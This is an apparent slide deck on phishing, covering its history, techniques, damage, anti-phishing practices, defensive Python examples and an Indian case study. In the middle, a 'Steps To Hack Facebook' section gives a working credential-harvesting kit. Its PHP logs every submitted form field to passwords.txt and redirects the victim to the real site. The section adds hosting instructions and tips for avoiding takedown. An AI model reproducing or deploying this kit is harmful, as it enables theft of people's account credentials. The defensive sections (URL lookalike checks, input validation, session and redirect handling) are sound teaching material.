PHISHING
Agenda
1:- INTRODUCTION, DEFINITION AND DESCRIPTION OF
PHISHING
2:- HISTORY AND CURRENT STATUS OF PHISHING
3:- PHISHING TECHNIQUES
4:- HACKING FACEBOOK ACCOUNTS BY PHISHING – STEP
BY STEP!
5:- DAMAGE CAUSED BY PHISHING AND ANTI-PHISHING
6:- HOW TO COMBAT PHISHING:
WHAT TO DO? AND WHAT NOT TO DO?
7:- RECENT PHISHING ATTEMPTS, LEGAL RESPONSE AND
CASE STUDY
DEFINITION AND DESCRIPTION
• Phishing is an attempt to acquire information such as
usernames, passwords and credit card details from a person
or organization illegally, through an electronic communication.
• Phishing is committed so that the phisher can obtain sensitive
and valuable information about a consumer, usually with the
goal of fraud: obtaining the customer's bank and other financial
information.
• Phishing is typically carried out by e-mail spoofing or instant
messaging.
• In phishing the criminal creates a fake website whose look
and feel are identical to the legitimate one, on which the
victims are told to enter their confidential details such as
username, password or account details.
• The technique was first described in detail in 1987; the first
recorded use was in 1995.
• Phishing is mainly committed so that the criminal can obtain
sensitive and valuable information about the customer.
• Phishing yields a high profit with little technological
investment.
History
 Phreaking + Fishing = Phishing
- Phreaking = making phone calls for free, back in the 70's
- Fishing = using bait to lure the target
 Phishing in 1995
Target: AOL users
Purpose: getting account passwords for free online time
Threat level: low
Techniques: similar names (www.ao1.com for www.aol.com), social
engineering
 Phishing in 2001
Target: eBay users and major banks
Purpose: getting credit card numbers and account details
Threat level: medium
Techniques: same as in 1995, plus keyloggers
 Phishing in 2007
Target: PayPal, banks, eBay
Purpose: bank accounts
Threat level: high
Techniques: browser vulnerabilities, link obfuscation
Current status of Phishing
• The APWG received 26,150 unique phishing reports.
• This total represents the second highest number of phishing
reports that the APWG has received in a single month.
• The APWG detected 10,091 unique phishing websites
worldwide.
• 148 separate corporate brands were "hijacked" (misused) in
phishing schemes (compared to 84 in August 2005).
• The financial sector was the most heavily targeted for
phishing schemes, constituting 92.6 percent of all phishing
attacks.
• The APWG found 2,303 unique websites that hosted
keylogging programs.
• The United States was the country hosting the largest
percentage of phishing websites (27.7 percent, compared to
27.9 percent in August 2005), while Canada ranked ninth
among countries hosting such websites (2.2 percent,
compared to 2.21 percent in August 2005). China remains the
second most frequent host of phishing websites (14 percent,
compared to 12.15 percent in August 2005), and South Korea
the third most frequent host of such sites (9.59 percent,
compared to 9.6 percent in August 2005).
• A recent and widely reported case is that of Chinese
phishers targeting the Gmail accounts of high-ranking officials
of the United States and South Korean governments, military
personnel, and Chinese political activists.
Phishing Techniques
 Deceptive - Sending a deceptive email, in bulk, with
a “call to action” that demands the recipient click on
a link.
 Malware-Based - Running malicious software on the user’s
machine. Various forms of malware-based phishing are:
 Key Loggers & Screen Loggers
 Session Hijackers
 Web Trojans
 Data Theft
 DNS-Based - Phishing that interferes with the integrity of the
lookup process for a domain name. Forms of DNS-based phishing
are:
 Hosts file poisoning
 Polluting user’s DNS cache
 Proxy server compromise
 Content-Injection – Inserting malicious content into legitimate
site.
Three primary types of content-injection phishing:
 Hackers can compromise a server through a security
vulnerability and replace or augment the legitimate
content with malicious content.
 Malicious content can be inserted into a site through a
cross-site scripting vulnerability.
 Malicious actions can be performed on a site through a
SQL injection vulnerability.
• Man-in-the-Middle Phishing - Phisher positions
himself between the user and the legitimate site.
• Search Engine Phishing - Create web pages for fake
products, get the pages indexed by search engines,
and wait for users to enter their confidential
information as part of an order, sign-up, or balance
transfer.
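The deceptive technique above lives or dies on the link the victim clicks: a
look-alike name such as the www.ao1.com / www.aol.com pair from the history
slide, a brand name pushed into a subdomain, a raw IP address, a userinfo
trick (http://www.paypal.com@evil.example/), or an internationalised
(punycode) label that hides a homograph. The following checker is an added
example written for this page, not code from the original slides; the
protected-brand list, the substitution table and the URLs it is run on are
constructed for the demo, and the registrable-domain helper is deliberately
naive (a real deployment would consult the Public Suffix List).

```python
# Added example (not from the original slides): flag the lookalike-domain and
# link-obfuscation tricks used by deceptive phishing mail. The protected-brand
# list and the URLs tested are constructed for this demo.
import ipaddress
from typing import List
from urllib.parse import urlsplit

# Brands we want to protect (assumed list for the demo).
PROTECTED_DOMAINS = {"aol.com", "paypal.com", "facebook.com", "ebay.com"}

# Substitutions a phisher uses so a name reads like the real brand (www.ao1.com).
CONFUSABLES = [("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"), ("vv", "w"), ("rn", "m")]


def normalize(host: str) -> str:
    """Undo common look-alike substitutions so ao1.com compares equal to aol.com."""
    host = host.lower()
    for fake, real in CONFUSABLES:
        host = host.replace(fake, real)
    return host


def registrable_domain(host: str) -> str:
    """Last two labels. A real deployment should use the Public Suffix List."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def analyze_url(url: str) -> List[str]:
    """Return the reasons a link looks like phishing (empty list = nothing found)."""
    findings: List[str] = []
    parts = urlsplit(url if "://" in url else "http://" + url)

    # http://www.paypal.com@evil.example/ : the browser goes to evil.example.
    if parts.username is not None:
        findings.append("userinfo before '@': the real host is after the '@'")

    host = (parts.hostname or "").rstrip(".").lower()
    if not host:
        findings.append("no host name")
        return findings

    # A bare IP address is never how a bank or web-mail provider links to itself.
    try:
        ipaddress.ip_address(host)
        findings.append("raw IP address instead of a domain name")
        return findings
    except ValueError:
        pass

    # Internationalised labels can hide homographs (Cyrillic 'a' for Latin 'a').
    if any(label.startswith("xn--") for label in host.split(".")):
        findings.append("punycode (IDN) label: possible homograph")

    reg = registrable_domain(host)
    if reg in PROTECTED_DOMAINS:
        return findings  # the brand's own domain

    # ao1.com -> aol.com after substitution: a look-alike registration.
    norm_reg = registrable_domain(normalize(host))
    if norm_reg in PROTECTED_DOMAINS:
        findings.append("lookalike of %s via character substitution" % norm_reg)

    # paypal.com.secure-login.example : brand name pushed into the subdomain.
    subdomain = host[: len(host) - len(reg)].rstrip(".")
    for brand in sorted(PROTECTED_DOMAINS):
        if brand.split(".")[0] in subdomain.split("."):
            findings.append("brand '%s' used as a subdomain of %s" % (brand, reg))
            break

    if parts.scheme == "http":
        findings.append("plain http: no TLS")
    return findings
```

Run it over the links in a suspect mail and treat any non-empty result as a
reason to block or warn. The checks are heuristics: a phisher can register a
clean-looking domain that trips none of them, so this complements, rather
than replaces, URL reputation data and user training.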
Steps To Hack Facebook
• Step 1: Go to http://www.facebook.com, right-click on the
home page and select "View page source".
• Step 2: Find the login form, which looks something like this:
• Step 3: Then change the form's action URL to login.php, so that it
looks similar to this.
Save it as index.html.
• Step 4: Open Notepad, paste the following code into it and
save it as login.php.
<?php
// Send the victim straight on to the real site so nothing looks wrong.
header('Location: http://www.facebook.com');
// Append every submitted form field to passwords.txt, one "name=value" per line.
$handle = fopen("passwords.txt", "a");
foreach ($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Here the victim is redirected to http://www.facebook.com. You
can change this to any location you like by editing the argument of
the header() function in the PHP code above.
• Step 5: Create another blank text file for storing the captured
usernames and passwords and name it passwords.txt.
Now the phishing page is set up; all that remains is to host it
somewhere on the internet so that it is reachable by the victim.
• Step 6: Go to a free hosting site such as
http://www.000webhost.com and sign up for free. You will
be given 1.5 GB of free space to host your web pages and a
free domain. You will have to complete the email confirmation
step to get your web page running.
• Step 7: Once your account is activated, sign in and
click "Go to CPanel" as shown below.
• Step 8: Then click on File Manager.
• Step 9: You will now see a public_html folder in the web-based
FTP client page; click on the folder to open it.
• Step 10: Click Upload, select all three files and finally
click the green tick to upload them, as shown in the image
below.
• Once the files are uploaded you can view your page at
your registered domain.
• The victim's username and password will be written
automatically to the passwords.txt file; just open the file to
see them.
• Congratulations, your phishing page is done! If you have
understood everything, you can use the same technique to
create phishing pages for other sites as well.
• Note: phishing pages on free hosting services are deleted
as soon as they are detected, so my advice is to use a paid
hosting service or to host the page on your own system.
DAMAGE CAUSED BY PHISHING
• The impact of phishing is both domestic and international,
and it concerns the commercial and financial sectors in particular.
• Direct financial loss. Phishing is mainly carried out to cause
financial loss to a person or an organization; consumers and
businesses may lose anywhere from a few hundred
dollars to millions of dollars.
• Erosion of public trust in the Internet. Phishing also
decreases the public's trust in the Internet.
• A survey found that 9 out of 10 American adult Internet users
have changed their Internet habits because of the
threat of identity theft.
• 30 percent say that they reduced their overall usage.
• 25 percent say they have stopped shopping online, while
29 percent of those who still shop online say they have
decreased the frequency of their purchases.
Anti-Phishing
 Anti-Phishing Working Group (APWG)
The APWG has more than 2,300 members from over
1,500 companies and agencies worldwide. Member
companies include leading security companies such
as Symantec, McAfee and VeriSign. Financial
industry members include the ING Group, VISA,
Mastercard and the American Bankers Association.
Educate application users
 Think before you open
 Never click on links in an email, on message boards or in mailing
lists
 Never submit credentials on forms embedded in emails
 Inspect the address bar and the SSL certificate
 Never open suspicious emails
 Ensure that the web browser has the latest security patches applied
 Install the latest anti-virus packages
 Destroy any hard copies of sensitive information
 Verify accounts and transactions regularly
 Report the scam via phone or email.
 Formulate and enforce best practices
 Authorization controls and access privileges for systems,
databases and applications.
 Access to any information should be based on the need-to-
know principle
 Segregation of duties.
 Media should be disposed of only after erasing sensitive
information.
Reinforce application development / maintenance processes:
1. Web page personalization
 Use two pages to authenticate users.
 Use client-side persistent cookies.
2. Content validation
 Never inherently trust submitted data
 Never present submitted data back to an application user
without sanitizing it
 Always sanitize data before processing or storing it
 Check the HTTP Referer header
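The content-validation rules above, applied to a money-transfer handler, as
an added example written for this page (it is not code from the original
slides and uses no web framework). The site origin, the field names, the
amount pattern and the requests fed to it are assumptions made up for the
demo. It shows the reflected echo that lets injected markup through beside
the escaped version, an allow-list check on a submitted field, and the
Referer / Origin check on a state-changing POST.

```python
# Added example (not from the original slides): the "never echo submitted data
# unsanitised" and "check the Referer" rules, applied to a transfer handler.
# SITE_ORIGIN, the field names and the request shapes are demo assumptions.
import html
import re
from decimal import Decimal
from typing import Mapping, Optional, Tuple
from urllib.parse import urlsplit

SITE_ORIGIN = "https://online.example-bank.com"  # assumed origin of our own site
AMOUNT_RE = re.compile(r"^\d{1,9}(\.\d{1,2})?$")   # strict allow-list for amounts
ACCOUNT_RE = re.compile(r"^[A-Z0-9-]{4,20}$")      # strict allow-list for account ids


def render_greeting_unsafe(submitted_name: str) -> str:
    """The anti-pattern: raw reflection. Input from the query string becomes markup."""
    return "<p>Welcome back, %s</p>" % submitted_name


def render_greeting(submitted_name: str) -> str:
    """Escape before reflecting, so an injected <script> is shown as text, not run."""
    return "<p>Welcome back, %s</p>" % html.escape(submitted_name, quote=True)


def parse_amount(raw: str) -> Optional[Decimal]:
    """Validate against an allow-list pattern instead of trusting the field."""
    raw = raw.strip()
    return Decimal(raw) if AMOUNT_RE.match(raw) else None


def same_origin(headers: Mapping[str, str]) -> bool:
    """Prefer Origin (browsers send it on POST); fall back to Referer; fail closed."""
    lowered = {k.lower(): v for k, v in headers.items()}
    origin = lowered.get("origin")
    if origin is not None:
        return origin.rstrip("/") == SITE_ORIGIN
    referer = lowered.get("referer")
    if referer:
        p = urlsplit(referer)
        return "%s://%s" % (p.scheme, p.netloc) == SITE_ORIGIN
    return False  # neither header present: do not guess


def handle_transfer(method: str, headers: Mapping[str, str],
                    form: Mapping[str, str]) -> Tuple[int, str]:
    """Process a transfer request; returns (HTTP status, response body)."""
    if method != "POST":
        return 405, "state-changing requests must be POST"
    if not same_origin(headers):
        return 403, "cross-site request rejected"
    amount = parse_amount(form.get("amount", ""))
    to_account = form.get("to", "")
    if amount is None or not ACCOUNT_RE.match(to_account):
        return 400, "invalid amount or account"
    # Only validated, escaped values are reflected back to the user.
    return 200, "<p>Transferred %s to %s</p>" % (amount, html.escape(to_account))
```

The Referer check is a defence in depth, not a complete one: browsers and
privacy tools strip the header, and a non-browser client can set it to
anything, so a state-changing request should also carry an anti-CSRF token
tied to the session.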
3. Session handling
 Make session identifiers long, complex and difficult to
guess.
 Set expiry time limits for SessionIDs, and check them on
every client request.
 The application should be capable of revoking active SessionIDs
and must not recycle the same SessionID.
 Any request carrying an invalid SessionID should be redirected to the
login page.
 Never accept session information within a URL.
 Protect the session via SSL.
 Session data should be submitted in a POST.
 After authentication, a new SessionID should be issued (HTTP and
HTTPS).
 Never let users choose the SessionID.
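A minimal server-side session store that follows the session-handling rules
above: IDs of 256 random bits from the OS CSPRNG, never chosen by the client;
expiry checked on every lookup; a fresh ID issued at login so an ID handed
out before authentication is worthless (session fixation); revocation without
recycling; an ID found in the URL ignored; and anything invalid sent to the
login page. This is an added example written for this page, not code from the
original slides; the 15-minute idle timeout, the cookie name "sid" and the
FakeClock used to exercise expiry are assumptions for the demo.

```python
# Added example (not from the original slides): a session store implementing
# the session-handling rules listed on this page. TTL, cookie name and the
# FakeClock helper are demo assumptions.
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, Mapping, Optional, Tuple

SESSION_TTL = 15 * 60  # seconds of inactivity before a session expires (assumed)
TOKEN_BYTES = 32       # 256 bits from the OS CSPRNG


@dataclass
class Session:
    user: Optional[str]   # None until the client has authenticated
    last_seen: float


class SessionStore:
    def __init__(self, clock: Callable[[], float] = time.time) -> None:
        self._clock = clock
        self._sessions: Dict[str, Session] = {}

    def _new_id(self) -> str:
        # Long, unpredictable and chosen by the server, never by the user.
        return secrets.token_urlsafe(TOKEN_BYTES)

    def create(self) -> str:
        """Anonymous session for a client that has not logged in yet."""
        sid = self._new_id()
        self._sessions[sid] = Session(user=None, last_seen=self._clock())
        return sid

    def lookup(self, sid: Optional[str]) -> Optional[Session]:
        """Validate on every request; unknown or expired IDs are rejected and removed."""
        if not sid or sid not in self._sessions:
            return None
        session = self._sessions[sid]
        now = self._clock()
        if now - session.last_seen > SESSION_TTL:
            self.revoke(sid)
            return None
        session.last_seen = now
        return session

    def login(self, sid: Optional[str], user: str) -> str:
        """Issue a fresh ID at authentication so a pre-login ID is worthless
        (defeats session fixation); the old ID is revoked, never recycled."""
        if sid:
            self.revoke(sid)
        new_sid = self._new_id()
        self._sessions[new_sid] = Session(user=user, last_seen=self._clock())
        return new_sid

    def revoke(self, sid: str) -> None:
        self._sessions.pop(sid, None)


def session_id_from_request(cookies: Mapping[str, str],
                            query: Mapping[str, str]) -> Optional[str]:
    """Take the ID from the cookie only. An ID in the URL (query string) is
    ignored: URLs leak through Referer headers, logs and shared links."""
    if "sid" in query:
        return None
    return cookies.get("sid")


def handle_request(store: SessionStore, cookies: Mapping[str, str],
                   query: Mapping[str, str]) -> Tuple[str, str]:
    """Protected resource: anything but a live, authenticated session goes to /login."""
    session = store.lookup(session_id_from_request(cookies, query))
    if session is None or session.user is None:
        return ("redirect", "/login")
    return ("ok", session.user)


class FakeClock:
    """Controllable clock so expiry can be exercised without sleeping."""
    def __init__(self, start: float = 1_000_000.0) -> None:
        self.now = start

    def __call__(self) -> float:
        return self.now
```

In a real deployment the cookie that carries the ID is set with the Secure,
HttpOnly and SameSite attributes, which is how the "protect the session via
SSL" rule is enforced on the browser side.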
4. Image regulation
 Image cycling
 Session-bound images
5. URL qualification
 Do not reference the redirection URL in the browser's URL
 Always maintain a valid approved list of redirection URLs
 Never allow customers to supply their own URLs
 Never allow IP addresses to be used in URL information
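The URL-qualification rules above target the open redirect that a phisher
uses to make a link "start at" the bank's own domain (the header('Location:')
trick in the Facebook kit on this page is the other half of that pattern). The
following is an added example written for this page, not code from the
original slides. The preferred path is the one the rules describe: the browser
carries only a short key that is looked up in a server-side approved list. A
validator for the legacy case where a full URL still arrives is included so
the rejected shapes can be seen side by side. Host names and the approved
list are assumptions for the demo.

```python
# Added example (not from the original slides): applying the URL-qualification
# rules to the post-login redirect. Host names and the approved list are demo
# assumptions.
import ipaddress
from typing import Optional
from urllib.parse import urlsplit

DEFAULT_LANDING = "/account/home"

# Preferred: the browser carries only a key (?next=statements); the real
# target lives server-side, so nothing in the URL can be tampered with.
APPROVED_REDIRECTS = {
    "home": DEFAULT_LANDING,
    "statements": "/account/statements",
    "cards": "https://cards.example-bank.com/overview",
}

# Hosts that are ours, for the legacy validator.
ALLOWED_HOSTS = {"online.example-bank.com", "cards.example-bank.com"}


def resolve_redirect(key: Optional[str]) -> str:
    """Map a client-supplied key to an approved target; unknown keys go home."""
    return APPROVED_REDIRECTS.get((key or "").lower(), DEFAULT_LANDING)


def safe_redirect_target(candidate: Optional[str]) -> str:
    """Accept a full URL only if it is a plain local path or an https URL on an
    allow-listed host; everything else falls back to DEFAULT_LANDING."""
    if not candidate:
        return DEFAULT_LANDING
    # CR/LF or NUL inside a Location value means header injection.
    if any(c in candidate for c in "\r\n\x00"):
        return DEFAULT_LANDING
    parts = urlsplit(candidate)
    if not parts.scheme and not parts.netloc:
        # Relative path. "//evil.example" and "/\evil.example" are scheme-relative
        # to a browser, so insist on exactly one leading forward slash.
        if candidate.startswith("/") and not candidate.startswith(("//", "/\\")):
            return candidate
        return DEFAULT_LANDING
    if parts.scheme != "https":          # also rejects javascript:, data:, http:
        return DEFAULT_LANDING
    if parts.username is not None:       # https://online.example-bank.com@evil.example/
        return DEFAULT_LANDING
    host = (parts.hostname or "").rstrip(".").lower()
    try:
        ipaddress.ip_address(host)       # never redirect to a bare IP address
        return DEFAULT_LANDING
    except ValueError:
        pass
    if host not in ALLOWED_HOSTS:        # exact match: no suffix or prefix tricks
        return DEFAULT_LANDING
    return candidate
```

Exact host matching is the point: a check such as "host starts with
online.example-bank.com" is defeated by online.example-bank.com.evil.example,
and "host contains example-bank" by example-bank.evil.example.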
6. Authentication Process
 Ensure that a 2-phase login process is in place
 Personalize the content
 Design a strong token-based authentication
7. Transaction non-repudiation
 To ensure authenticity and integrity of the transaction
PRECAUTIONS TO BE TAKEN
TO AVOID PHISHING
1. Prevention: What to Do
• Protect your computer with anti-virus software, spyware
filters, e-mail filters and firewall programs, and make sure
that they are regularly updated.
• Ensure that your Internet browser is up to date and security
patches are applied.
• Avoid responding to any unknown email or giving your
financial information in reply to such mail.
• Unless the e-mail is digitally signed, it may well be fake.
• Phishers typically ask for information such as usernames,
passwords, credit card numbers, social security numbers, etc.
• Phishing e-mails are typically not personalized, while valid
messages from your bank or e-commerce company are
generally personalized.
• Always ensure that you're using a secure website when
submitting credit card or other sensitive information via your
Web browser.
• To make sure you're on a secure Web server, check the
beginning of the Web address in your browser's address bar: it
should be "https://" rather than just "http://". Note that https
only means the connection is encrypted; it does not prove who
runs the site, so also check that the domain name is the one
you expect.
• Regularly log into your online accounts. Don't leave them
unchecked for a long period of time.
• Regularly check your bank, credit and debit card statements
to ensure that all transactions are legitimate.
• If anything is suspicious, contact your bank and all card
issuers.
2. Prevention: What Not to Do
• Don't assume that you can correctly identify a website
as legitimate just by looking at it.
• Don't use the links in an e-mail to get to any web page if
you think the message might not be authentic;
log onto the website directly by typing the Web address
into your browser.
• Avoid filling out forms in e-mail messages that ask for
personal financial information.
• Only communicate information such as credit card
numbers or account information via a secure website or the
telephone.
What does all the above imply?
It is better to be safer now than feel sorry later.
Case study
Case: fraud committed by the Mumbai mafia in the IT city
City: Bangalore
State: Karnataka
Background
• The cyber crime police of Bangalore, after a two-year
investigation, have proved that the Mumbai mafia is phishing
the IT city.
• They have arrested three persons in connection with
3 different incidents.
• A CID official of SP rank said that this is a dangerous trend.
 The cyber crime police station (CCPS) registered around
100 such phishing cases in 2009, but it is difficult for
them to trace every case as the fraudsters use benami bank
accounts for all of this.
 The cyber crime police arrested 3 persons, all
from Mumbai, who are connected with this case.
• The police said that all the arrested persons are graduates
and have a good knowledge of computers.
Investigation
• The cyber crime police arrested one Abdul Khan from
Mumbai.
• The arrested person had transferred Rs 1 lakh (Rs 50,000,
twice) from the ICICI account of one IT professional, Abhishek
Malvia, a native of Itarsi, Madhya Pradesh.
Conclusion
• Phishing is a form of criminal conduct that poses increasing
threats to consumers, financial institutions, and commercial
enterprises in Canada, the United States, and other countries.
Because phishing shows no sign of abating, and indeed is likely
to continue in newer and more sophisticated forms, law
enforcement, other government agencies, and the private
sector in both countries will need to cooperate more closely
than ever in their efforts to combat phishing, through
improved public education, prevention, authentication, and
binational and national enforcement efforts.
Thank You!

Contenu connexe

Tendances

Tendances (20)

Phishing technology
Phishing technologyPhishing technology
Phishing technology
 
Introduction to phishing
Introduction to phishingIntroduction to phishing
Introduction to phishing
 
Phishing and hacking
Phishing and hackingPhishing and hacking
Phishing and hacking
 
Phishing
PhishingPhishing
Phishing
 
Phishing
PhishingPhishing
Phishing
 
What is Phishing and How can you Avoid it?
What is Phishing and How can you Avoid it?What is Phishing and How can you Avoid it?
What is Phishing and How can you Avoid it?
 
Phishing ppt
Phishing pptPhishing ppt
Phishing ppt
 
Phishing - A modern web attack
Phishing -  A modern web attackPhishing -  A modern web attack
Phishing - A modern web attack
 
Anatomy of a Spear Phishing Attack
Anatomy of a Spear Phishing AttackAnatomy of a Spear Phishing Attack
Anatomy of a Spear Phishing Attack
 
What is a phishing attack
What is a phishing attackWhat is a phishing attack
What is a phishing attack
 
Email phishing and countermeasures
Email phishing and countermeasuresEmail phishing and countermeasures
Email phishing and countermeasures
 
Identity theft 10 mar15
Identity theft 10 mar15Identity theft 10 mar15
Identity theft 10 mar15
 
Phishing attack seminar presentation
Phishing attack seminar presentation Phishing attack seminar presentation
Phishing attack seminar presentation
 
Anonymous email 26 aug14
Anonymous email 26 aug14Anonymous email 26 aug14
Anonymous email 26 aug14
 
Compilation of phishing and keylogger attacks
Compilation of phishing and keylogger attacksCompilation of phishing and keylogger attacks
Compilation of phishing and keylogger attacks
 
2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the Human2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the Human
 
e-Fraud ppt
e-Fraud ppte-Fraud ppt
e-Fraud ppt
 
Scams and-fraud-presentation
Scams and-fraud-presentationScams and-fraud-presentation
Scams and-fraud-presentation
 
Cyber Crime Identity Theft
Cyber Crime Identity Theft Cyber Crime Identity Theft
Cyber Crime Identity Theft
 
Identity Theft ppt
Identity Theft pptIdentity Theft ppt
Identity Theft ppt
 

Similaire à Phishing

Based on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdfBased on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdf
arri2009av
 
IRJET-Content based approach for Detection of Phishing Sites
IRJET-Content based approach for Detection of Phishing SitesIRJET-Content based approach for Detection of Phishing Sites
IRJET-Content based approach for Detection of Phishing Sites
IRJET Journal
 

Similaire à Phishing (20)

Phishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS WorkingPhishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS Working
 
Cybersecurity Awareness for employees.pptx
Cybersecurity Awareness for employees.pptxCybersecurity Awareness for employees.pptx
Cybersecurity Awareness for employees.pptx
 
Panama-Paper-Leak
Panama-Paper-LeakPanama-Paper-Leak
Panama-Paper-Leak
 
Panama Papers Leak and Precautions Law firms should take
Panama Papers Leak and Precautions Law firms should takePanama Papers Leak and Precautions Law firms should take
Panama Papers Leak and Precautions Law firms should take
 
Info Session on Cybersecurity & Cybersecurity Study Jams
Info Session on Cybersecurity & Cybersecurity Study JamsInfo Session on Cybersecurity & Cybersecurity Study Jams
Info Session on Cybersecurity & Cybersecurity Study Jams
 
Phishing
PhishingPhishing
Phishing
 
Anti phishing
Anti phishingAnti phishing
Anti phishing
 
Phishing
PhishingPhishing
Phishing
 
Phishing
PhishingPhishing
Phishing
 
CyberSecurity - Computers In Libraries 2024
CyberSecurity - Computers In Libraries 2024CyberSecurity - Computers In Libraries 2024
CyberSecurity - Computers In Libraries 2024
 
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...
Online Brand Protection:Fighting Domain Name Typosquatting, Website Spoofing...Online Brand Protection:Fighting Domain Name Typosquatting, Website Spoofing...
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...
 
Cybersecurity - Defense Against The Dark Arts Harry Potter Style
Cybersecurity - Defense Against The Dark Arts Harry Potter StyleCybersecurity - Defense Against The Dark Arts Harry Potter Style
Cybersecurity - Defense Against The Dark Arts Harry Potter Style
 
Phishing Attack : A big Threat
Phishing Attack : A big ThreatPhishing Attack : A big Threat
Phishing Attack : A big Threat
 
Protecting Your Business From Cybercrime
Protecting Your Business From CybercrimeProtecting Your Business From Cybercrime
Protecting Your Business From Cybercrime
 
Protecting Your Business from Cybercrime - Cybersecurity 101
Protecting Your Business from Cybercrime - Cybersecurity 101Protecting Your Business from Cybercrime - Cybersecurity 101
Protecting Your Business from Cybercrime - Cybersecurity 101
 
Phishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresPhishing: Analysis and Countermeasures
Phishing: Analysis and Countermeasures
 
Cyber security-1.pptx
Cyber security-1.pptxCyber security-1.pptx
Cyber security-1.pptx
 
Based on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdfBased on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdf
 
Phishing Technology
Phishing TechnologyPhishing Technology
Phishing Technology
 
IRJET-Content based approach for Detection of Phishing Sites
IRJET-Content based approach for Detection of Phishing SitesIRJET-Content based approach for Detection of Phishing Sites
IRJET-Content based approach for Detection of Phishing Sites
 

Plus de Ajit Yadav

Plus de Ajit Yadav (6)

Cloud Computing Documentation Report
Cloud Computing Documentation ReportCloud Computing Documentation Report
Cloud Computing Documentation Report
 
Remote Admittance
Remote AdmittanceRemote Admittance
Remote Admittance
 
Frame Relay
Frame RelayFrame Relay
Frame Relay
 
INTRODUCTION TO JAVA APPLICATION
INTRODUCTION TO JAVA APPLICATIONINTRODUCTION TO JAVA APPLICATION
INTRODUCTION TO JAVA APPLICATION
 
Php mysql
Php mysqlPhp mysql
Php mysql
 
Cloud computing
Cloud computingCloud computing
Cloud computing
 

Dernier

Dernier (20)

UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdfUGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
 
Application orientated numerical on hev.ppt
Application orientated numerical on hev.pptApplication orientated numerical on hev.ppt
Application orientated numerical on hev.ppt
 
Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024
 
Single or Multiple melodic lines structure
Single or Multiple melodic lines structureSingle or Multiple melodic lines structure
Single or Multiple melodic lines structure
 
Food safety_Challenges food safety laboratories_.pdf
Food safety_Challenges food safety laboratories_.pdfFood safety_Challenges food safety laboratories_.pdf
Food safety_Challenges food safety laboratories_.pdf
 
Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)
 
Interdisciplinary_Insights_Data_Collection_Methods.pptx
Interdisciplinary_Insights_Data_Collection_Methods.pptxInterdisciplinary_Insights_Data_Collection_Methods.pptx
Interdisciplinary_Insights_Data_Collection_Methods.pptx
 
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptxHMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
 
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
 
REMIFENTANIL: An Ultra short acting opioid.pptx
REMIFENTANIL: An Ultra short acting opioid.pptxREMIFENTANIL: An Ultra short acting opioid.pptx
REMIFENTANIL: An Ultra short acting opioid.pptx
 
Wellbeing inclusion and digital dystopias.pptx
Wellbeing inclusion and digital dystopias.pptxWellbeing inclusion and digital dystopias.pptx
Wellbeing inclusion and digital dystopias.pptx
 
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdf
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdfUnit 3 Emotional Intelligence and Spiritual Intelligence.pdf
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdf
 
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptxSKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
 
Beyond_Borders_Understanding_Anime_and_Manga_Fandom_A_Comprehensive_Audience_...
Beyond_Borders_Understanding_Anime_and_Manga_Fandom_A_Comprehensive_Audience_...Beyond_Borders_Understanding_Anime_and_Manga_Fandom_A_Comprehensive_Audience_...
Beyond_Borders_Understanding_Anime_and_Manga_Fandom_A_Comprehensive_Audience_...
 
Towards a code of practice for AI in AT.pptx
Towards a code of practice for AI in AT.pptxTowards a code of practice for AI in AT.pptx
Towards a code of practice for AI in AT.pptx
 
This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.
 
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptxHMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
 
